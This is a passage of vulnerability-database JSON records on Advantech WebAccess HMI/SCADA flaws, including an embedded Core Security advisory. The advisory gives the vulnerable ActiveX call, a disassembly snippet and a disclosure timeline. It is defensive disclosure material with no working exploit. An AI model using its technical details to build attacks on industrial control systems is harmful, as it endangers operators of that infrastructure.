"ZDI", "id": "ZDI-18-1329" }, { "db": "CNVD", "id": "CNVD-2018-21936" }, { "db": "BID", "id": "105736" }, { "db": "IVD", "id": "e2fec8cf-39ab-11e9-89cc-000c29342cb1" }, { "db": "VULHUB", "id": "VHN-128414" } ], "trust": 3.96 }, "external_ids": { "_id": null, "data": [ { "db": "NVD", "id": "CVE-2018-17908", "trust": 5.0 }, { "db": "ICS CERT", "id": "ICSA-18-298-02", "trust": 3.4 }, { "db": "BID", "id": "105736", "trust": 2.0 }, { "db": "SECTRACK", "id": "1041957", "trust": 1.7 }, { "db": "CNNVD", "id": "CNNVD-201810-1272", "trust": 0.9 }, { "db": "CNVD", "id": "CNVD-2018-21936", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2018-011341", "trust": 0.8 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-7167", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-18-1331", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-7154", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-18-1329", "trust": 0.7 }, { "db": "IVD", "id": "E2FEC8CF-39AB-11E9-89CC-000C29342CB1", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-128414", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "e2fec8cf-39ab-11e9-89cc-000c29342cb1" }, { "db": "ZDI", "id": "ZDI-18-1331" }, { "db": "ZDI", "id": "ZDI-18-1329" }, { "db": "CNVD", "id": "CNVD-2018-21936" }, { "db": "VULHUB", "id": "VHN-128414" }, { "db": "BID", "id": "105736" }, { "db": "JVNDB", "id": "JVNDB-2018-011341" }, { "db": "CNNVD", "id": "CNNVD-201810-1272" }, { "db": "NVD", "id": "CVE-2018-17908" } ] }, "id": "VAR-201810-0492", "iot": { "_id": null, "data": true, "sources": [ { "db": "IVD", "id": "e2fec8cf-39ab-11e9-89cc-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2018-21936" }, { "db": "VULHUB", "id": "VHN-128414" } ], "trust": 1.33470696 }, "iot_taxonomy": { "_id": null, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.8 } ], "sources": [ { "db": "IVD", "id": "e2fec8cf-39ab-11e9-89cc-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2018-21936" } ] }, "last_update_date": "2024-11-23T21:38:15.715000Z", "patch": { "_id": null, "data": [ { "title": "Advantech has issued an update to correct this vulnerability.", "trust": 1.4, "url": "https://ics-cert.us-cert.gov/advisories/ICSA-18-298-02" }, { "title": "Advantech WebAccess", "trust": 0.8, "url": "https://www.advantech.com/industrial-automation/webaccess/webaccessscada" }, { "title": "Advantech WebAccess improper access control vulnerability patch", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/143395" }, { "title": "Advantech WebAccess Fixes for access control error vulnerabilities", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=86344" } ], "sources": [ { "db": "ZDI", "id": "ZDI-18-1331" }, { "db": "ZDI", "id": "ZDI-18-1329" }, { "db": "CNVD", "id": "CNVD-2018-21936" }, { "db": "JVNDB", "id": "JVNDB-2018-011341" }, { "db": "CNNVD", "id": "CNNVD-201810-1272" } ] }, "problemtype_data": { "_id": null, "data": [ { "problemtype": "CWE-284", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-128414" }, { "db": "JVNDB", "id": "JVNDB-2018-011341" }, { "db": "NVD", "id": "CVE-2018-17908" } ] }, "references": { "_id": null, "data": [ { "trust": 4.8, "url": "https://ics-cert.us-cert.gov/advisories/icsa-18-298-02" }, { "trust": 1.7, "url": "http://www.securityfocus.com/bid/105736" }, { "trust": 1.7, "url": "http://www.securitytracker.com/id/1041957" }, { "trust": 0.8, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-17908" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-17908" }, { "trust": 0.3, "url": "http://webaccess.advantech.com" } ], "sources": [ { "db": "ZDI", "id": "ZDI-18-1331" }, { "db": "ZDI", "id": "ZDI-18-1329" }, { "db": "CNVD", "id": "CNVD-2018-21936" }, { "db": "VULHUB", "id": "VHN-128414" }, { "db": "BID", "id": "105736" }, { "db": "JVNDB", "id": "JVNDB-2018-011341" }, { "db": "CNNVD", "id": "CNNVD-201810-1272" }, { "db": "NVD", "id": "CVE-2018-17908" } ] }, "sources": { "_id": null, "data": [ { "db": "IVD", "id": "e2fec8cf-39ab-11e9-89cc-000c29342cb1", "ident": null }, { "db": "ZDI", "id": "ZDI-18-1331", "ident": null }, { "db": "ZDI", "id": "ZDI-18-1329", "ident": null }, { "db": "CNVD", "id": "CNVD-2018-21936", "ident": null }, { "db": "VULHUB", "id": "VHN-128414", "ident": null }, { "db": "BID", "id": "105736", "ident": null }, { "db": "JVNDB", "id": "JVNDB-2018-011341", "ident": null }, { "db": "CNNVD", "id": "CNNVD-201810-1272", "ident": null }, { "db": "NVD", "id": "CVE-2018-17908", "ident": null } ] }, "sources_release_date": { "_id": null, "data": [ { "date": "2018-10-28T00:00:00", "db": "IVD", "id": "e2fec8cf-39ab-11e9-89cc-000c29342cb1", "ident": null }, { "date": "2018-10-31T00:00:00", "db": "ZDI", "id": "ZDI-18-1331", "ident": null }, { "date": "2018-10-31T00:00:00", "db": "ZDI", "id": "ZDI-18-1329", "ident": null }, { "date": "2018-10-28T00:00:00", "db": "CNVD", "id": "CNVD-2018-21936", "ident": null }, { "date": "2018-10-29T00:00:00", "db": "VULHUB", "id": "VHN-128414", "ident": null }, { "date": "2018-10-25T00:00:00", "db": "BID", "id": "105736", "ident": null }, { "date": "2019-01-10T00:00:00", "db": "JVNDB", "id": "JVNDB-2018-011341", "ident": null }, { "date": "2018-10-26T00:00:00", "db": "CNNVD", "id": "CNNVD-201810-1272", "ident": null }, { "date": "2018-10-29T18:29:08.277000", "db": "NVD", "id": "CVE-2018-17908", "ident": null } ] }, "sources_update_date": { "_id": null, "data": [ { "date": "2018-10-31T00:00:00", "db": "ZDI", "id": "ZDI-18-1331", "ident": null }, { "date": "2018-10-31T00:00:00", "db": "ZDI", "id": "ZDI-18-1329", "ident": null }, { "date": "2018-10-28T00:00:00", "db": "CNVD", "id": "CNVD-2018-21936", "ident": null }, { "date": "2019-10-09T00:00:00", "db": "VULHUB", "id": "VHN-128414", "ident": null }, { "date": "2018-10-25T00:00:00", "db": "BID", "id": "105736", "ident": null }, { "date": "2019-01-10T00:00:00", "db": "JVNDB", "id": "JVNDB-2018-011341", "ident": null }, { "date": "2019-10-17T00:00:00", "db": "CNNVD", "id": "CNNVD-201810-1272", "ident": null }, { "date": "2024-11-21T03:55:11.150000", "db": "NVD", "id": "CVE-2018-17908", "ident": null } ] }, "threat_type": { "_id": null, "data": "local", "sources": [ { "db": "CNNVD", "id": "CNNVD-201810-1272" } ], "trust": 0.6 }, "title": { "_id": null, "data": "Advantech WebAccess Improper Access Control Vulnerability", "sources": [ { "db": "IVD", "id": "e2fec8cf-39ab-11e9-89cc-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2018-21936" } ], "trust": 0.8 }, "type": { "_id": null, "data": "Access control error", "sources": [ { "db": "IVD", "id": "e2fec8cf-39ab-11e9-89cc-000c29342cb1" }, { "db": "CNNVD", "id": "CNNVD-201810-1272" } ], "trust": 0.8 } }
var-201606-0258
Vulnerability from variot
Buffer overflow in Advantech WebAccess before 8.1_20160519 allows local users to cause a denial of service via a crafted DLL file. Advantech WebAccess (formerly known as BroadWin WebAccess) is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. A buffer overflow vulnerability exists in versions prior to Advantech WebAccess 8.1_20160519. An attacker could exploit this vulnerability to insert and execute arbitrary code with a specially crafted DLL file. Advantech WebAccess is prone to the following security vulnerabilities: 1. Unsafe ActiveX control local security vulnerability 2. A local buffer-overflow vulnerability Local attackers can exploit these issues to perform unauthorized actions and crash the affected application; denying service to legitimate users. Due to the nature of these issues, code-execution may be possible but this has not been confirmed
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201606-0258", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "webaccess", "scope": "lte", "trust": 1.0, "vendor": "advantech", "version": "8.1" }, { "model": "webaccess", "scope": "lt", "trust": 0.8, "vendor": "advantech", "version": "8.1_20160519" }, { "model": "webaccess \u003c8.1 20160519", "scope": null, "trust": 0.6, "vendor": "advantech", "version": null }, { "model": "webaccess", "scope": "eq", "trust": 0.6, "vendor": "advantech", "version": "8.1" }, { "model": null, "scope": "eq", "trust": 0.2, "vendor": "webaccess", "version": "*" } ], "sources": [ { "db": "IVD", "id": "686c7746-d588-4c1e-99ee-d9fb20515c64" }, { "db": "CNVD", "id": "CNVD-2016-04267" }, { "db": "JVNDB", "id": "JVNDB-2016-003326" }, { "db": "CNNVD", "id": "CNNVD-201606-488" }, { "db": "NVD", "id": "CVE-2016-4528" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:advantech:advantech_webaccess", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2016-003326" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Zhou Yu of Acorn Network Security.", "sources": [ { "db": "BID", "id": "91346" } ], "trust": 0.3 }, "cve": "CVE-2016-4528", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "exploitabilityScore": 8.6, "id": "CVE-2016-4528", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 1.8, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "COMPLETE", "baseScore": 4.9, "confidentialityImpact": "NONE", "exploitabilityScore": 3.9, "id": "CNVD-2016-04267", "impactScore": 6.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 0.6, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "author": "IVD", "availabilityImpact": "COMPLETE", "baseScore": 4.9, "confidentialityImpact": "NONE", "exploitabilityScore": 3.9, "id": "686c7746-d588-4c1e-99ee-d9fb20515c64", "impactScore": 6.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 0.2, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:C", "version": "2.9 [IVD]" }, { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "exploitabilityScore": 8.6, "id": "VHN-93347", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 0.1, "vectorString": "AV:N/AC:M/AU:N/C:N/I:N/A:P", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "LOCAL", "author": "nvd@nist.gov", "availabilityImpact": "HIGH", "baseScore": 5.0, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "exploitabilityScore": 1.3, "id": "CVE-2016-4528", "impactScore": 3.6, "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "trust": 1.8, "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:H", "version": "3.0" } ], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2016-4528", "trust": 1.0, "value": "MEDIUM" }, { "author": "NVD", "id": "CVE-2016-4528", "trust": 0.8, "value": "Medium" }, { "author": "CNVD", "id": "CNVD-2016-04267", "trust": 0.6, "value": "MEDIUM" }, { "author": "CNNVD", "id": "CNNVD-201606-488", "trust": 0.6, "value": "MEDIUM" }, { "author": "IVD", "id": "686c7746-d588-4c1e-99ee-d9fb20515c64", "trust": 0.2, "value": "MEDIUM" }, { "author": "VULHUB", "id": "VHN-93347", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "IVD", "id": "686c7746-d588-4c1e-99ee-d9fb20515c64" }, { "db": "CNVD", "id": "CNVD-2016-04267" }, { "db": "VULHUB", "id": "VHN-93347" }, { "db": "JVNDB", "id": "JVNDB-2016-003326" }, { "db": "CNNVD", "id": "CNNVD-201606-488" }, { "db": "NVD", "id": "CVE-2016-4528" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Buffer overflow in Advantech WebAccess before 8.1_20160519 allows local users to cause a denial of service via a crafted DLL file. Advantech WebAccess (formerly known as BroadWin WebAccess) is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. A buffer overflow vulnerability exists in versions prior to Advantech WebAccess 8.1_20160519. An attacker could exploit this vulnerability to insert and execute arbitrary code with a specially crafted DLL file. Advantech WebAccess is prone to the following security vulnerabilities:\n1. Unsafe ActiveX control local security vulnerability\n2. A local buffer-overflow vulnerability\nLocal attackers can exploit these issues to perform unauthorized actions and crash the affected application; denying service to legitimate users. Due to the nature of these issues, code-execution may be possible but this has not been confirmed", "sources": [ { "db": "NVD", "id": "CVE-2016-4528" }, { "db": "JVNDB", "id": "JVNDB-2016-003326" }, { "db": "CNVD", "id": "CNVD-2016-04267" }, { "db": "BID", "id": "91346" }, { "db": "IVD", "id": "686c7746-d588-4c1e-99ee-d9fb20515c64" }, { "db": "VULHUB", "id": "VHN-93347" } ], "trust": 2.7 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2016-4528", "trust": 3.6 }, { "db": "ICS CERT", "id": "ICSA-16-173-01", "trust": 3.1 }, { "db": "CNNVD", "id": "CNNVD-201606-488", "trust": 0.9 }, { "db": "CNVD", "id": "CNVD-2016-04267", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2016-003326", "trust": 0.8 }, { "db": "BID", "id": "91346", "trust": 0.3 }, { "db": "IVD", "id": "686C7746-D588-4C1E-99EE-D9FB20515C64", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-93347", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "686c7746-d588-4c1e-99ee-d9fb20515c64" }, { "db": "CNVD", "id": "CNVD-2016-04267" }, { "db": "VULHUB", "id": "VHN-93347" }, { "db": "BID", "id": "91346" }, { "db": "JVNDB", "id": "JVNDB-2016-003326" }, { "db": "CNNVD", "id": "CNNVD-201606-488" }, { "db": "NVD", "id": "CVE-2016-4528" } ] }, "id": "VAR-201606-0258", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "IVD", "id": "686c7746-d588-4c1e-99ee-d9fb20515c64" }, { "db": "CNVD", "id": "CNVD-2016-04267" }, { "db": "VULHUB", "id": "VHN-93347" } ], "trust": 1.474496345 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.8 } ], "sources": [ { "db": "IVD", "id": "686c7746-d588-4c1e-99ee-d9fb20515c64" }, { "db": "CNVD", "id": "CNVD-2016-04267" } ] }, "last_update_date": "2024-11-23T22:01:30.573000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Advantech WebAccess", "trust": 0.8, "url": "http://www.advantech.com/industrial-automation/webaccess" }, { "title": "Patch for Advantech WebAccess Buffer Overflow Vulnerability", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/78041" }, { "title": "Advantech WebAccess Buffer Overflow Vulnerability Fix", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=62414" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2016-04267" }, { "db": "JVNDB", "id": "JVNDB-2016-003326" }, { "db": "CNNVD", "id": "CNNVD-201606-488" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-119", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-93347" }, { "db": "JVNDB", "id": "JVNDB-2016-003326" }, { "db": "NVD", "id": "CVE-2016-4528" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 3.1, "url": "https://ics-cert.us-cert.gov/advisories/icsa-16-173-01" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-4528" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-4528" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2016-04267" }, { "db": "VULHUB", "id": "VHN-93347" }, { "db": "JVNDB", "id": "JVNDB-2016-003326" }, { "db": "CNNVD", "id": "CNNVD-201606-488" }, { "db": "NVD", "id": "CVE-2016-4528" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "IVD", "id": "686c7746-d588-4c1e-99ee-d9fb20515c64" }, { "db": "CNVD", "id": "CNVD-2016-04267" }, { "db": "VULHUB", "id": "VHN-93347" }, { "db": "BID", "id": "91346" }, { "db": "JVNDB", "id": "JVNDB-2016-003326" }, { "db": "CNNVD", "id": "CNNVD-201606-488" }, { "db": "NVD", "id": "CVE-2016-4528" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2016-06-23T00:00:00", "db": "IVD", "id": "686c7746-d588-4c1e-99ee-d9fb20515c64" }, { "date": "2016-06-23T00:00:00", "db": "CNVD", "id": "CNVD-2016-04267" }, { "date": "2016-06-25T00:00:00", "db": "VULHUB", "id": "VHN-93347" }, { "date": "2016-06-21T00:00:00", "db": "BID", "id": "91346" }, { "date": "2016-06-28T00:00:00", "db": "JVNDB", "id": "JVNDB-2016-003326" }, { "date": "2016-06-22T00:00:00", "db": "CNNVD", "id": "CNNVD-201606-488" }, { "date": "2016-06-25T01:59:02.563000", "db": "NVD", "id": "CVE-2016-4528" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2016-06-23T00:00:00", "db": "CNVD", "id": "CNVD-2016-04267" }, { "date": "2016-06-27T00:00:00", "db": "VULHUB", "id": "VHN-93347" }, { "date": "2016-06-21T00:00:00", "db": "BID", "id": "91346" }, { "date": "2016-06-28T00:00:00", "db": "JVNDB", "id": "JVNDB-2016-003326" }, { "date": "2016-06-27T00:00:00", "db": "CNNVD", "id": "CNNVD-201606-488" }, { "date": "2024-11-21T02:52:24.780000", "db": "NVD", "id": "CVE-2016-4528" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201606-488" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Advantech WebAccess Buffer Overflow Vulnerability", "sources": [ { "db": "IVD", "id": "686c7746-d588-4c1e-99ee-d9fb20515c64" }, { "db": "CNVD", "id": "CNVD-2016-04267" }, { "db": "CNNVD", "id": "CNNVD-201606-488" } ], "trust": 1.4 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Buffer overflow", "sources": [ { "db": "IVD", "id": "686c7746-d588-4c1e-99ee-d9fb20515c64" }, { "db": "CNNVD", "id": "CNNVD-201606-488" } ], "trust": 0.8 } }
var-201411-0359
Vulnerability from variot
Stack-based buffer overflow in Advantech WebAccess, formerly BroadWin WebAccess, before 8.0 allows remote attackers to execute arbitrary code via a crafted ip_address parameter in an HTML document. Advantech WebAccess HMI/SCADA is an HMI/SCADA software. A stack buffer overflow vulnerability exists in Advantech WebAccess because the application failed to properly check the user-supplied data before copying it to a full-size buffer. An attacker could exploit this vulnerability to execute arbitrary code in the context of an application (usually Internet Explorer) that is affected by an ActiveX control. Failed exploit attempts will likely result in denial-of-service conditions. Advantech WebAccess 7.2 is vulnerable; other versions may also be affected. The software supports dynamic graphic display and real-time data control, and provides functions of remote control and management of automation equipment. Core Security - Corelabs Advisory http://corelabs.coresecurity.com/
Advantech WebAccess Stack-based Buffer Overflow
- Advisory Information
Title: Advantech WebAccess Stack-based Buffer Overflow Advisory ID: CORE-2014-0010 Advisory URL: http://www.coresecurity.com/advisories/advantech-webAccess-stack-based-buffer-overflow Date published: 2014-11-19 Date of last update: 2014-11-19 Vendors contacted: Advantech Release mode: Coordinated release
-
Vulnerability Description
Advantech WebAccess [1] is a browser-based software package for human-machine interfaces HMI, and supervisory control and data acquisition SCADA.
-
WebAccess 7.2 .
-
Vendor Information, Solutions and Workarounds
Given that this is a client-side vulnerability, affected users should avoid opening untrusted '.html' files. Core Security also recommends those affected use third party software such as Sentinel [3] or EMET [2] that could help to prevent the exploitation of affected systems to some extent.
Additionally the vendor released WebAccess v8 [4] where it has deleted the vulnerable file 'webeye.ocx' but if version upgrade is being performed, the vulnerable ocx file is not deleted at all, therefore we do not consider this a correct fix.
-
Credits
This vulnerability was discovered and researched by Ricardo Narvaja from Core Security Consulting Services. The publication of this advisory was coordinated by Joaqu\xedn Rodr\xedguez Varela from Core Advisories Team.
-
This is caused because the application copies to the stack the string without checking its length.
/-----
document.vdoactx.Connect(ip_address, port_no);
-----/
/-----
0001C2AA 8B11 MOV EDX,DWORD PTR DS:[ECX] 0001C2AC 8A45 08 MOV AL,BYTE PTR SS:[EBP+8] 0001C2AF 8802 MOV BYTE PTR DS:[EDX],AL 0001C2B1 FF01 INC DWORD PTR DS:[ECX] 0001C2B3 0FB6C0 MOVZX EAX,AL 0001C2B6 EB 0B JMP SHORT 0001C2C3
-----/
-
Report Timeline . 2014-10-01:
Initial notification sent to ICS-CERT informing of the vulnerability and requesting the vendor's contact information. 2014-10-01:
ICS-CERT informs that they will ask the vendor if they want to coordinate directly with us or if they prefer to have ICS-CERT mediate. They request the vulnerability report. 2014-10-01:
ICS-CERT informs that the vendor answered that they would like the ICS-CERT to mediate the coordination of the advisory. They requested again the vulnerability report. 2014-10-01:
We send the vulnerability detail, including technical description and a PoC. 2014-10-09:
We request a status update on the reported vulnerability. 2014-10-20:
ICS-CERT informs that the vendor has patched WebAccess in version 8.0 and published it. This was done without informing us in order to make a coordianted release. The ICS-CERT asks if we can test the fix. 2014-10-21:
We clearly state how we disagree with the uncoordinated published fix. We began testing the fix. 2014-10-21:
We inform them that the "webeye.ocx" file (version 1.0.1.35) is still present in the new version. 2014-10-27:
ICS-CERT informs us that the vendor has removed the vulnerable OCX file from the new version but it doesn't remove it from previous installations, making the new version still vulnerable. 2014-11-13:
We inform them that we will publish this advisory as user release on Wednesday 19th of November. 2014-11-19:
Advisory CORE-2014-0010 published.
-
References
[1] http://webaccess.advantech.com/. [2] http://support.microsoft.com/kb/2458544. [3] https://github.com/CoreSecurity/sentinel. [4] http://webaccess.advantech.com/webaccess_download.php?lang=eng.
-
About CoreLabs
CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.
-
About Core Security
Core Security enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations.
Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com.
-
Disclaimer
The contents of this advisory are copyright (c) 2014 Core Security and (c) 2014 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
-
PGP/GPG Keys
This advisory has been signed with the GPG key of Core Security advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc
{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201411-0359", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, 